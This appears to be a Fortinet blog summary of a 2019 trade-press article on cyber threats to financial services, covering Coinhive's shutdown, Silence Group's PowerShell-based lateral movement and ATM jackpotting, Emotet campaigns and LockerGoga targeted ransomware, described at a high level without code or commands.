This is a summary of an article written for Global Banking and Finance Review by Fortinet’s Senior Security Strategist/Researcher and CTI Lead, Tony Giandomenico. The entire article can be accessed here.
Cyber criminals continue to target the financial services industry to steal payment card data, online banking accounts, and to compromise ATM machines using ransomware, cryptomining, and other malware. Defending against this is made more difficult due to challenges such as blending new technology with legacy systems while meeting evolving compliance standards.
A recent Fortinet Threat Landscape Report highlights threats targeted at a number of industries, including financial services. Coinhive, originally launched in 2017, focused on the Monero cryptocurrency, and had great success in the black market. However, Coinhive announced in February that it would be shutting down, in part because Monero value crashed, and the introduction of an algorithm that made mining Monero slower.
However, cyber criminals have been quick to fill the gap by developing several new techniques to replace CoinHive.
One such criminal enterprise is Silence Group. While they primarily target financial institutions in Russia and eastern Europe, the infrastructure they rely on to support their criminal activities has expanded to include Australia, Canada, France, Ireland, Spain, Sweden, and the United States.
At the same time, Silence Group has grown more sophisticated, recently employing “living off the land” tactics by leveraging pre-installed and publicly available tools such as PowerShell, that allowing them to accelerate lateral movement across a network while enhancing evasiveness because they use processes the network has already identified as legitimate.
In another attack, this one a spear phishing strategy, the Silence Group managed to compromise banks to gather financial data and enable the remote withdrawal of money from ATMs, an attack known as “jackpotting.”
Another criminal team, known as Emotet, launched several new campaigns during Q1 of 2019 using information-stealing, ransomware, and banking Trojan modules.
One serious development is a shift away from random attacks and towards things like tailored ransomware. One recent example is LockerGoga, a ransomware variant that surfaced early this year.
“Despite causing severe disruption to targets in Europe and the United States through attacks informed by research and due diligence, researchers have pointed out the end goal of these attacks was not extortion. There is still not a clear understanding of the motivation.”
However, what is clear is that highly targeted attacks, especially when combined with advance living off the land tactics, help cybercriminals evade detection, bypass security sensors, and achieve their goals with little to no recourse from their targets. For example, there is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed.
“Cyber criminals continue to modify their attack strategies to increase accuracy and achieve their primary goals. For the financial services industry, this can result in the targeting of online banking accounts, payment cards, and, as was demonstrated in Q1, even ATM machines.”
In order to defend against these sophisticated threats, financial institutions must rely on threat intelligence and advanced behavioral and system analytics in order to identify threats and circumvent the impact of these new targeted cyberattacks.
This is a summary of an article written for Global Banking and Finance Review entitled, Understanding the Impact of Targeted Cyber Threats on Financial Services, written by Fortinet’s Senior Security Strategist/Researcher and CTI Lead, Anthony Giandomenico, and published on GlobalBankingandFinance.com on June 26, 2019.
Read about the FortiGuard Security Rating Service, which provides security audits and best practices.